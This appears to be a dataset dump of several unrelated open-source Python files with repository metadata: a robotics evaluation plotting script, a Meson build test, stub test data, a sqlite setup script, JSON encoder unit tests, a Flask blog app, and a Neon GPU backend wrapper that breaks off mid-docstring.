| 3 | 2021-06-03T16:06:01.000Z | 2021-08-15T13:40:09.000Z | rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py | wq13552463699/TriFinger_Research | 6ddfab4531cb4ba05a0fbb41227a734295dce378 | [
"BSD-3-Clause"
]
| 4 | 2021-05-12T02:34:34.000Z | 2021-07-18T19:54:50.000Z | #!/usr/bin/env python3
'''
This code traverses a directories of evaluation log files and
record evaluation scores as well as plotting the results.
'''
import os
import argparse
import json
import copy
from shutil import copyfile
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from utils import *
MAX_ALIGN_STEPS = 75000 - 1 # This depends on the evaluation code used to generate the logs
def generate_csv(log_dir, csv_file):
'''
Traverse and read log files, and then output csv file from the eval data.
- file to be generated: 'eval_scores.csv'
- columns: state_machine_id, timesteps, rot_error
'''
df = pd.DataFrame(columns=['state_machine_id', 'state_machine_name', 'timesteps', 'rot_error'])
model_names = extract_model_names(log_dir)
# Traverse all episodes and add each entry to data frame
for state_machine_id, episode_idx, episode_dir in traverse_all_episodes(log_dir):
json_util = JsonUtil(os.path.join(episode_dir, 'goal.json'))
entry = {
'state_machine_id': state_machine_id,
'state_machine_name': model_names[state_machine_id],
**json_util.load()
}
# Handling the timesteps==-1 case
if entry['reachfinish'] == -1:
entry['reachfinish'] = MAX_ALIGN_STEPS
if entry['reachstart'] == -1:
raise ValueError('\'reachstart\' in {episode_dir}/goal.json does not contain a valid value.')
# Rename dict keys
entry['timesteps'] = entry.pop('reachfinish') - entry.pop('reachstart')
entry['rot_error'] = entry.pop('align_obj_error')
entry['init_rot_error'] = entry.pop('init_align_obj_error', None)
# Add a new entry
entry['rot_error_diff'] = entry['init_rot_error'] - entry['rot_error']
df = df.append(entry, ignore_index=True) # df.append works differently from python since it is stupid
df.to_csv(csv_file, index=False)
def generate_plot(input_csv_file, plot_file):
data = pd.read_csv(input_csv_file)
sns.scatterplot(data=data, x="timesteps", y="rot_error", hue="state_machine_name", alpha=0.8)
plt.savefig(plot_file)
| 35.639344 | 110 | 0.689512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 994 | 0.457222 |
9ef2bd5f0fee2640fb7fcf65e291ea514c7f1058 | 286 | py | Python | test cases/common/64 custom header generator/makeheader.py | objectx/meson | c0f097c0c74551972f7ec2203cd960824984f058 | [
"Apache-2.0"
]
| null | null | null | test cases/common/64 custom header generator/makeheader.py | objectx/meson | c0f097c0c74551972f7ec2203cd960824984f058 | [
"Apache-2.0"
]
| null | null | null | test cases/common/64 custom header generator/makeheader.py | objectx/meson | c0f097c0c74551972f7ec2203cd960824984f058 | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# NOTE: this file does not have the executable bit set. This tests that
# Meson can automatically parse shebang lines.
import sys
template = '#define RET_VAL %s\n'
output = template % (open(sys.argv[1]).readline().strip())
open(sys.argv[2], 'w').write(output)
| 26 | 71 | 0.713287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.573427 |
9ef42081bff35de1f92bff97bfccd08e32e6f3d8 | 395 | py | Python | studio_ghibli/movies/test_data.py | hbansal0122/studio_ghibli_project | 1a2df853f9d5088aa137f372ab0ee83ce8ba3667 | [
"MIT"
]
| null | null | null | studio_ghibli/movies/test_data.py | hbansal0122/studio_ghibli_project | 1a2df853f9d5088aa137f372ab0ee83ce8ba3667 | [
"MIT"
]
| null | null | null | studio_ghibli/movies/test_data.py | hbansal0122/studio_ghibli_project | 1a2df853f9d5088aa137f372ab0ee83ce8ba3667 | [
"MIT"
]
| null | null | null | """ Test data"""
stub_films = [{
"id": "12345",
"title": "This is film one",
},{
"id": "23456",
"title": "This is film two",
}]
stub_poeple = [{
"name": "person 1",
"films": ["url/12345", "url/23456"]
},{
"name": "person 2",
"films": ["url/23456"]
},{
"name": "person 3",
"films": ["url/12345"]
},{
"name": "person 4",
"films": ["url/12345"]
}] | 16.458333 | 39 | 0.463291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.594937 |
9ef4febad34c41f83b4899c15a9e9cfec2b40a27 | 236 | py | Python | data_converters/fsdbripper/create_new_db.py | osvaldolove/amiberry-api | 3310592d2411c69f7c225edb3e3907e6a5e6caf8 | [
"MIT"
]
| null | null | null | data_converters/fsdbripper/create_new_db.py | osvaldolove/amiberry-api | 3310592d2411c69f7c225edb3e3907e6a5e6caf8 | [
"MIT"
]
| null | null | null | data_converters/fsdbripper/create_new_db.py | osvaldolove/amiberry-api | 3310592d2411c69f7c225edb3e3907e6a5e6caf8 | [
"MIT"
]
| 1 | 2018-08-22T21:55:26.000Z | 2018-08-22T21:55:26.000Z | import sqlite3
from constants import DESTINATION_DB
destination_connection = sqlite3.connect(DESTINATION_DB)
destination_cursor = destination_connection.cursor()
destination_cursor.execute('CREATE TABLE game(uuid, payload)')
| 26.222222 | 63 | 0.817797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.144068 |
9ef65f5bf372723d5444efb6cd95a0880cc13cef | 7,366 | py | Python | upvote/gae/shared/common/json_utils_test.py | cclauss/upvote | 9d526fec72690cde1575dbd32dacf68cbbab81d1 | [
"Apache-2.0"
]
| null | null | null | upvote/gae/shared/common/json_utils_test.py | cclauss/upvote | 9d526fec72690cde1575dbd32dacf68cbbab81d1 | [
"Apache-2.0"
]
| null | null | null | upvote/gae/shared/common/json_utils_test.py | cclauss/upvote | 9d526fec72690cde1575dbd32dacf68cbbab81d1 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for json_utils."""
import datetime
import json
from google.appengine.ext import ndb
from common.testing import basetest
from upvote.gae.datastore.models import santa
from upvote.gae.shared.common import json_utils
from upvote.shared import constants
class TestModel(ndb.Model):
datetime_prop = ndb.DateTimeProperty()
int_prop = ndb.IntegerProperty()
string_prop = ndb.StringProperty()
class BaseEncoderTest(basetest.AppEngineTestCase):
def setUp(self):
super(BaseEncoderTest, self).setUp()
self.test_model = TestModel(
datetime_prop=datetime.datetime(2015, 6, 3, 12, 30, 0),
int_prop=111,
string_prop='STRING!')
self.test_key = self.test_model.put()
self.blockable_key = ndb.Key(
santa.SantaBlockable, 'aaaabbbbccccddddeeeeffffgggg')
self.santa_event = santa.SantaEvent(
id='2324342',
blockable_key=self.blockable_key,
event_type=constants.EVENT_TYPE.ALLOW_UNKNOWN,
executing_user='user1',
file_name='Product.app',
file_path='/Applications/Product.app/Contents/MacOs',
host_id='AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC',
last_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0),
first_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0))
def _PerformEncoding(self, to_encode):
encoded = self.json_encoder.encode(to_encode)
return json.loads(encoded)
def _VerifyEncoding(self, expected, actual):
if isinstance(expected, list):
self.assertTrue(isinstance(actual, list))
self.assertEqual(len(expected), len(actual))
for i, j in zip(sorted(expected), sorted(actual)):
self._VerifyEncoding(i, j)
elif isinstance(expected, dict):
self.assertTrue(isinstance(actual, dict))
# assertDictEqual would be more concise, but this keeps us from having to
# update the expected dict every time there's a model change, e.g.
# SantaEvent.
for key, value in expected.iteritems():
self.assertIn(key, actual)
self.assertEqual(value, actual[key])
else:
self.assertEqual(expected, actual)
class JSONEncoderTest(BaseEncoderTest):
def setUp(self):
super(JSONEncoderTest, self).setUp()
self.json_encoder = json_utils.JSONEncoder()
def testEncode_Set(self):
actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Frozenset(self):
actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Datetime(self):
actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0))
self._VerifyEncoding('2015-04-01T17:00Z', actual)
def testEncode_Date(self):
actual = self._PerformEncoding(datetime.date(2014, 2, 3))
self._VerifyEncoding('2014-02-03', actual)
def testEncode_Time(self):
actual = self._PerformEncoding(datetime.time(10, 20, 30))
self._VerifyEncoding('10:20:30', actual)
def testEncode_Key(self):
expected = self.test_key.urlsafe()
actual = self._PerformEncoding(self.test_key)
self._VerifyEncoding(expected, actual)
def testEncode_Model(self):
expected = {
'datetime_prop': '2015-06-03T12:30Z',
'int_prop': 111,
'string_prop': 'STRING!'}
actual = self._PerformEncoding(self.test_model)
self._VerifyEncoding(expected, actual)
def testEncode_SantaEvent(self):
# Test the encoding of a single SantaEvent.
expected = {
'blockable_key': self.blockable_key.urlsafe(),
'class_': ['Event', 'SantaEvent'],
'event_type': constants.EVENT_TYPE.ALLOW_UNKNOWN,
'executing_user': 'user1',
'file_name': 'Product.app',
'file_path': '/Applications/Product.app/Contents/MacOs',
'host_id': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC',
'id': '2324342',
'last_blocked_dt': '2015-04-01T17:00Z',
'first_blocked_dt': '2015-04-01T17:00Z',
}
actual = self._PerformEncoding(self.santa_event)
self._VerifyEncoding(expected, actual)
# Test the encoding of a SantaEvent list.
actual = self._PerformEncoding([self.santa_event])
self._VerifyEncoding([expected], actual)
def testEncodeBoolean(self):
"""Test encoding a single Boolean value."""
actual = self._PerformEncoding(True)
self._VerifyEncoding(True, actual)
class JSONEncoderJavascriptTest(BaseEncoderTest):
def setUp(self):
super(JSONEncoderJavascriptTest, self).setUp()
self.json_encoder = json_utils.JSONEncoderJavaScript()
def testEncode_Set(self):
actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Frozenset(self):
actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Datetime(self):
actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0))
self._VerifyEncoding('2015-04-01T17:00Z', actual)
def testEncode_Date(self):
actual = self._PerformEncoding(datetime.date(2014, 2, 3))
self._VerifyEncoding('2014-02-03', actual)
def testEncode_Time(self):
actual = self._PerformEncoding(datetime.time(10, 20, 30))
self._VerifyEncoding('10:20:30', actual)
def testEncode_Key(self):
expected = self.test_key.urlsafe()
actual = self._PerformEncoding(self.test_key)
self._VerifyEncoding(expected, actual)
def testEncode_Model(self):
expected = {
'datetimeProp': '2015-06-03T12:30Z',
'intProp': 111,
'stringProp': 'STRING!'}
actual = self._PerformEncoding(self.test_model)
self._VerifyEncoding(expected, actual)
def testEncode_SantaEvent(self):
# Test the encoding of a single SantaEvent.
expected = {
'blockableKey': self.blockable_key.urlsafe(),
'class_': ['Event', 'SantaEvent'],
'eventType': constants.EVENT_TYPE.ALLOW_UNKNOWN,
'executingUser': 'user1',
'fileName': 'Product.app',
'filePath': '/Applications/Product.app/Contents/MacOs',
'hostId': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC',
'id': '2324342',
'lastBlockedDt': '2015-04-01T17:00Z',
'firstBlockedDt': '2015-04-01T17:00Z',
}
actual = self._PerformEncoding(self.santa_event)
self._VerifyEncoding(expected, actual)
# Test the encoding of a SantaEvent list.
actual = self._PerformEncoding([self.santa_event])
self._VerifyEncoding([expected], actual)
def testEncodeBoolean(self):
"""Test encoding a single Boolean value."""
actual = self._PerformEncoding(True)
self._VerifyEncoding(True, actual)
if __name__ == '__main__':
basetest.main()
| 33.481818 | 79 | 0.691827 | 6,448 | 0.875373 | 0 | 0 | 0 | 0 | 0 | 0 | 2,069 | 0.280885 |
9ef7f25002d6a0233c11be0350ae657d327330f8 | 3,728 | py | Python | app.py | YukiNagat0/Blog | 6f01d1a3e73f1f865b5d22dbdbb27a5acfb3e937 | [
"MIT"
]
| 1 | 2021-06-24T17:48:37.000Z | 2021-06-24T17:48:37.000Z | app.py | YukiNagat0/Blog | 6f01d1a3e73f1f865b5d22dbdbb27a5acfb3e937 | [
"MIT"
]
| null | null | null | app.py | YukiNagat0/Blog | 6f01d1a3e73f1f865b5d22dbdbb27a5acfb3e937 | [
"MIT"
]
| null | null | null | from os import path
from typing import Union
from datetime import datetime
from flask import Flask, request, redirect, render_template
from flask_wtf import CSRFProtect
from werkzeug.utils import secure_filename
from data import db_session
from data.posts import Posts
from forms.edit_post_form import EditPostForm
app = Flask(__name__)
app.config['SECRET_KEY'] = 'SECRET_KEY'
csrf_protect = CSRFProtect(app)
UPLOAD_FOLDER = 'static/posts_img/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
DATA_BASE = 'db/blog.sqlite'
app.config['DATA_BASE'] = DATA_BASE
def edit_post_in_data_base(form: EditPostForm, post: Union[Posts, None]):
db_sess = db_session.create_session()
post_title = form.title.data
post_text = form.text.data
post_author = form.author.data
post_image = form.image.data
# --- Фотография ---
if not post_image:
post_image_name = '' # Картинки нет
else:
current_id = db_sess.query(Posts).order_by(Posts.id.desc()).first()
current_id = current_id.id + 1 if current_id else 1
real_image_name = secure_filename(post_image.filename)
post_image_name = f'{current_id}{real_image_name[real_image_name.rfind("."):]}'
post_image.save(path.join(app.config['UPLOAD_FOLDER'], post_image_name))
# --- Фотография ---
if not post: # Добавление поста
post = Posts()
post.title = post_title
post.image_name = post_image_name
post.text = post_text
post.author = post_author
post.date = datetime.now()
db_sess.add(post)
else: # редактирование
post.title = post_title
post.image_name = post_image_name
post.text = post_text
post.author = post_author
post.date = datetime.now()
db_sess.merge(post)
db_sess.commit()
db_sess.close()
return redirect('/')
@app.route('/')
def index():
params = {'title': 'Blog', 'UPLOAD_FOLDER': app.config['UPLOAD_FOLDER']}
db_sess = db_session.create_session()
posts = db_sess.query(Posts).order_by(Posts.id.desc()).all()
view = render_template('blog.html', **params, posts=posts)
db_sess.close()
return view
@app.route('/add_post', methods=['GET', 'POST'])
def add_post():
params = {'title': 'Добавление поста', 'action_type': 'Добавление поста', 'submit_text': 'Добавить'}
form = EditPostForm()
params['form'] = form
if form.validate_on_submit():
return edit_post_in_data_base(form, None)
return render_template('edit_post.html', **params)
@app.route('/edit_post/<int:post_id>', methods=['GET', 'POST'])
def edit_post(post_id: int):
params = {'title': 'Редактирование поста', 'action_type': 'Редактирование поста', 'submit_text': 'Редактировать'}
form = EditPostForm()
params['form'] = form
db_sess = db_session.create_session()
post: Posts = db_sess.query(Posts).filter(Posts.id == post_id).first()
db_sess.close()
if not post:
return redirect('/')
if request.method == 'GET':
form.title.data = post.title
form.text.data = post.text
form.author.data = post.author
elif form.validate_on_submit():
return edit_post_in_data_base(form, post)
return render_template('edit_post.html', **params)
@app.route('/delete_post/<int:post_id>')
def delete_post(post_id: int):
db_sess = db_session.create_session()
post = db_sess.query(Posts).filter(Posts.id == post_id).first()
if post:
db_sess.delete(post)
db_sess.commit()
db_sess.close()
return redirect('/')
def main():
db_session.global_init(app.config['DATA_BASE'])
app.run('127.0.0.1', 8080)
if __name__ == '__main__':
main()
| 25.888889 | 117 | 0.668455 | 0 | 0 | 0 | 0 | 1,797 | 0.463503 | 0 | 0 | 805 | 0.207635 |
9ef839c4fcb13ab1bd28852911644c75dc9c3837 | 48,320 | py | Python | neon/backends/gpu.py | kashif/neon | d4d8ed498ee826b67f5fda1746d2d65c8ce613d2 | [
"Apache-2.0"
]
| 1 | 2018-07-17T16:54:58.000Z | 2018-07-17T16:54:58.000Z | neon/backends/gpu.py | kashif/neon | d4d8ed498ee826b67f5fda1746d2d65c8ce613d2 | [
"Apache-2.0"
]
| null | null | null | neon/backends/gpu.py | kashif/neon | d4d8ed498ee826b67f5fda1746d2d65c8ce613d2 | [
"Apache-2.0"
]
| 2 | 2016-06-09T13:05:00.000Z | 2021-02-18T14:18:15.000Z | # ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Neon backend wrapper for the NervanaGPU library. Most functions are thin
wrappers around functions from the NervanaGPU class, the GPUTensor is taken
directly from NervanaGPU as well.
NervanaGPU is available at `<https://github.com/NervanaSystems/nervanagpu>`
"""
import logging
from neon.backends.backend import Backend
from nervanagpu import NervanaGPU
from neon.diagnostics.timing_decorators import FlopsDecorator
import pycuda.driver as drv
import numpy as np
logger = logging.getLogger(__name__)
class GPU(Backend):
"""
Sets up a NervanaGPU based backend for matrix operations.
Note that some functions defined in the generic Backend class such as
cross-map pooling and normalization and are not implemented for
this backend.
"""
default_dtype = np.float32
def __init__(self, rng_seed, stochastic_round=False, device_id=0):
import pycuda.driver as drv
drv.init()
global ctx
ctx = drv.Device(device_id).make_context()
import atexit
atexit.register(ctx.pop)
self.ng = NervanaGPU(stochastic_round=stochastic_round)
logger.info("Initialized NervanaGPU with stochastic_round=%s",
stochastic_round)
self.rng_seed = rng_seed
self.rng_init()
self.device_id = device_id if device_id is not None else 0
def __getstate__(self):
"""
Defines what and how we go about serializing an instance of this class.
Returns:
self.__dict__: The full contents of the backend class instance,
except for the mem_pool which is on device and
cannot be serialized.
"""
if hasattr(self, 'mem_pool') and self.mem_pool is not None:
self.mem_pool_pickle = {'shape': self.mem_pool.shape,
'dtype': np.float32}
self.mem_pool = None
return self.__dict__
def __setstate__(self, state):
"""
Defines how we go about deserializing into an instance of this class.
Arguments:
self.__dict__: The full contents of the backend class instance,
except for the mem_pool which is on device and
cannot be serialized.
"""
self.__dict__.update(state)
self.mem_pool = self.ng.empty(self.mem_pool_pickle['shape'],
dtype=self.mem_pool_pickle['dtype'])
def init_mempool(self, shape, dtype=default_dtype):
"""
Allocates a memory pool for temporary storage
"""
self.mem_pool = self.ng.empty(shape, dtype=dtype)
def alloc_host_mem(self, shape, dtype=default_dtype):
return drv.pagelocked_empty(shape, dtype, order="C", mem_flags=0)
def create_stream(self):
return drv.Stream()
def synchronize(self):
pass
def async_copy(self, dest, src, stream=None):
drv.memcpy_htod_async(dest.gpudata, src, stream)
def rng_init(self):
"""
Initialize and seed the pseudo random number genrator. Random numbers
are generated on the host using numpy, then transfered to device.
"""
seed = None
if 'rng_seed' in self.__dict__:
seed = self.rng_seed
logger.info("Seeding random number generator with: %s", str(seed))
np.random.seed(seed)
def flop_timing_init(self, decorate_fc, decorate_conv, decorate_ew):
"""
Initialize FLOP timing. Wraps the specified MOP calls via a decorator
to record elapsed time and number of operations.
Arguments:
decorate_fc (list): string giving the function names of fully
connected layer forward/backward/update calls
to time.
decorate_conv (list): string giving the function names of
convolutional layer forward/backward/update
calls to time.
decorate_ew (list): string giving the function names of element-wise
calls to time.
Notes:
Must be called prior to first flop_timing_start call
"""
self.start = drv.Event()
self.end = drv.Event()
self.flop_timer = FlopsDecorator(self)
self.flop_timer.decorate(decorate_fc=decorate_fc,
decorate_conv=decorate_conv,
decorate_ew=decorate_ew)
def flop_timinig_start(self):
"""
Start a new FLOP timer.
Returns:
None: dummy value (not used)
"""
return self.start.record()
def flop_timing_finish(self, start_time):
"""
Complete current FLOP timing.
Arguments:
start_time (unused): ignored.
Returns:
float: elapsed time in seconds since prior flop_timing_start call.
"""
self.end.record()
self.end.synchronize()
return self.end.time_since(self.start)
def uniform(self, low=0.0, high=1.0, size=1, dtype=default_dtype,
persist_values=True, name=None):
"""
generate numpy random number and convert to a GPUTensor.
If called with dype=None it will probably explode
"""
ary = np.random.uniform(low, high, size)
return self.ng.array(ary, dtype=dtype, name=name)
def normal(self, loc=0.0, scale=1.0, size=1, dtype=default_dtype,
persist_values=True, name=None):
"""
Gaussian/Normal random number sample generation
"""
ary = np.random.normal(loc, scale, size)
return self.ng.array(ary, dtype=dtype, name=name)
def fprop_fc(self, out, inputs, weights, layer=None):
"""
Forward propagate the inputs of a fully connected network layer to
produce output pre-activations (ready for transformation by an
activation function).
Arguments:
out (GPUTensor): Where to store the forward propagated results.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
weights (GPUTensor): The weight coefficient values for this layer.
layer (Layer): The layer object.
"""
self.ng.dot(weights, inputs, out)
def bprop_fc(self, out, weights, deltas, layer=None):
"""
Backward propagate the error through a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
layer (Layer): The layer object.
"""
self.ng.dot(weights.T, deltas, out)
def update_fc(self, out, inputs, deltas, layer=None):
"""
Compute the updated gradient for a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the updated gradient value.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
deltas (GPUTensor): The error values for this layer
layer (Layer): The layer object.
"""
self.ng.dot(deltas, inputs.T, out)
def update_fc_bias(self, err, out):
"""
Compute the updated bias gradient for a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the updated gradient value.
err (GPUTensor): backpropagated error
"""
self.ng.sum(err, axis=1, out=out)
def add_fc_bias(self, inputs, bias):
"""
Add the bias for a fully connected network layer.
Arguments:
inputs (GPUTensor): the input to update.
bias (GPUTensor): the amount to increment
"""
self.ng.add(inputs, bias, out=inputs)
def fprop_conv(self, out, inputs, weights, ofmshape, ofmsize, ofmlocs,
ifmshape, links, nifm, padding, stride, ngroups, fpropbuf,
local=False):
"""
Forward propagate the inputs of a convolutional network layer to
produce output pre-activations (ready for transformation by an
activation function).
Arguments:
out (GPUTensor): Where to store the forward propagated results.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
weights (GPUTensor): The weight coefficient values for this layer.
ofmshape (tuple): Dimensions of each output feature map (typically
number of height and width neurons).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element
in each output feature map stored in out.
ifmshape (tuple): Dimensions of each input feature map (typically
number of height and width neurons). For this
backend we expect these values to be square.
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
convolution operation.
stride (int): Number of neurons to shift the filter at each step.
ngroups (int): Number of groups.
fpropbuf (GPUTensor): Temporary storage buffer used to hold the
convolved outputs for a single receptive
field. Not used for this backend.
local (bool, optional): Whether to do local filtering (True) or
convolution (False, the default)
"""
'''
N: Number of images in mini-batch
C: Number of input feature maps
K: Number of output feature maps
D: Depth of input image
H: Height of input image
W: Width of input image
T: Depth of filter kernel
R: Height of filter kernel
S: Width of filter kernel
'''
self.ng.fprop_conv(layer=fpropbuf, I=inputs, F=weights, O=out,
alpha=1.0, repeat=1)
def bprop_conv(self, out, weights, deltas, ofmshape, ofmsize, ofmlocs,
ifmshape, links, padding, stride, nifm, ngroups, bpropbuf,
local=False):
"""
Backward propagate the error through a convolutional network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
ofmshape (tuple): Dimensions of each output feature map (typically
height and width).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
ifmshape (tuple): Dimensions of each input feature map (typically
height and width).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
convolution operation.
stride (int): Number of neurons to shift the filter at each step.
ngroups (int): Number of groups.
bpropbuf (GPUTensor): Temporary storage buffer used to hold the
backpropagated error for a single receptive
field
local (bool, optional): Whether to do local filtering (True) or
convolution (False, the default)
"""
self.ng.bprop_conv(layer=bpropbuf, F=weights, E=deltas, grad_I=out,
alpha=1.0, repeat=1)
def update_conv(self, out, inputs, weights, deltas, ofmshape, ofmsize,
ofmlocs, ifmshape, links, nifm, padding, stride, ngroups,
fwidth, updatebuf, local=False, layer=None):
"""
Compute the updated gradient for a convolutional network layer.
Arguments:
out (GPUTensor): Where to store the updated gradient value.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
ofmshape (tuple): Dimensions of each output feature map (typically
height and width).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
ifmshape (tuple): Dimensions of each input feature map (typically
height and width).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
convolution operation.
stride (int): Number of neurons to shift the filter at each step.
ngroups (int): Number of groups.
fwidth (int): Filter width.
updatebuf (GPUTensor): Temporary storage buffer used to hold the
updated gradient for a single receptive
field
local (bool, optional): Whether to do local filtering (True) or
convolution (False, the default)
layer (Layer): The layer object.
"""
self.ng.update_conv(layer=updatebuf, I=inputs, E=deltas, grad_F=out,
alpha=1.0, repeat=1)
def fprop_pool(self, out, inputs, op, ofmshape, ofmsize, ofmlocs, fshape,
ifmshape, links, nifm, padding, stride, fpropbuf):
"""
Forward propagate the inputs of a Pooling network layer to
produce output pre-activations (ready for transformation by an
activation function).
Arguments:
out (GPUTensor): Where to store the forward propagated results.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
op (string): The type of pooling operation to apply. We support
"max", "avg", "l2" currently.
ofmshape (tuple): Dimensions of each output feature map (typically
number of height and width neurons).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
fshape (tuple): Dimensions of each filter (typically height and
width).
ifmshape (tuple): Dimensions of each input feature map (typically
number of height and width neurons).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
pooling operation.
stride (int): Number of neurons to shift the filter at each step.
fpropbuf (GPUTensor): Temporary storage buffer used to hold the
pooled outputs for a single receptive field.
"""
op = op.lower()
if op == "max":
self.ng.fprop_pool(layer=fpropbuf, I=inputs, O=out, repeat=1)
else:
raise AttributeError("unexpected pooling op type: %s", op)
def bprop_pool(self, out, fouts, inputs, deltas, op, ofmshape, ofmsize,
ofmlocs, fshape, fpsize, ifmshape, links, nifm, padding,
stride, bpropbuf):
"""
Backward propagate the error through a pooling network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
fouts (GPUTensor): Forward propagated outputs from the previous
layer.
inputs (GPUTensor): Will be either the dataset input values (first
layer), or the outputs from the previous layer.
deltas (GPUTensor): The error values for this layer
op (string): The type of pooling operation to apply. We support
"max", "avg", "l2" currently.
ofmshape (tuple): Dimensions of each output feature map (typically
height and width).
ofmsize (int): Total size of each output feature map.
ofmlocs (GPUTensor): Indices giving the location of each element in
each output feature map stored in out.
fshape (tuple): Dimensions of each filter (typically height and
width).
fpsize (int): The size of each filter.
ifmshape (tuple): Dimensions of each input feature map (typically
height and width).
links (GPUTensor): Input receptive field indices.
nifm (int): Total number of input feature maps.
padding (int): Number of additional elements to include along each
dimension of each local receptive field during the
pooling operation.
stride (int): Number of neurons to shift the filter at each step.
bpropbuf (GPUTensor): Temporary storage buffer used to hold the
backpropagated error for a single receptive
field
"""
op = op.lower()
if op == "max":
self.ng.bprop_pool(layer=bpropbuf, I=inputs, E=deltas, grad_I=out,
repeat=1)
else:
raise AttributeError("unexpected pooling op type: %s", op)
def logistic(self, x, out):
"""
Logistic sigmoid nonlinearity, 1/(1+exp(-x))
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
"""
self.ng.sig(x, out=out)
return out
def transpose(self, untransposed, transposed):
transposed[:] = untransposed.T
def crossent(self, y, t, partial, out, epsilon, doscale, ismulti=False):
"""
Computes cross entropy cost.
Arguments:
y (GPUTensor): Model outputs
t (GPUTensor): Targets
partial (GPUTensor): temporary buffer used for 2D reduction
out (GPUTensor): Storage for the cross entropy output
epsilon (float): constant for numerical stability
doscale (boolean): If True, cross_entropy is scaled by batch size
ismulti (boolean): If True, compute multi class cross_entropy
"""
sumbuf = partial.reshape((partial.size, 1))[:partial.shape[0]]
if ismulti:
self.ng.sum(-t * self.ng.log(y + epsilon),
axis=None, partial=sumbuf, out=out)
else:
self.ng.sum((t - 1) * self.ng.log(1 - y + epsilon) -
t * self.ng.log(y + epsilon),
axis=None, partial=sumbuf, out=out)
if doscale:
out[:] = out / y.shape[1]
return out
def logistic_compound(self, inputs, outputs):
"""
Applies logistic function and its derivative to the dataset passed.
Arguments:
inputs (GPUTensor): Input data to be transformed. This also
acts as storage for the output of the
derivative function.
outputs (GPUTensor): Storage for the transformed output.
"""
# Apply the logistic function.
outputs[:] = self.ng.sig(inputs)
inputs[:] = (1.0 - outputs) * inputs
def rectlin(self, x, out):
"""
Rectified Linear nonlinearity
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
"""
self.ng.maximum(x, 0., out=out)
return out
def rectlin_derivative(self, x, out):
"""
Rectified linear nonlinearity derivative
Arguments:
x (GPUTensor): Input tensor
out (GPUTensor): Output tensor
"""
self.ng.greater(x, 0, out=out)
return out
def rectleaky(self, x, slope, out):
"""
Leaky rectified linear nonlinearity
Arguments:
x (GPUTensor): Input tensor
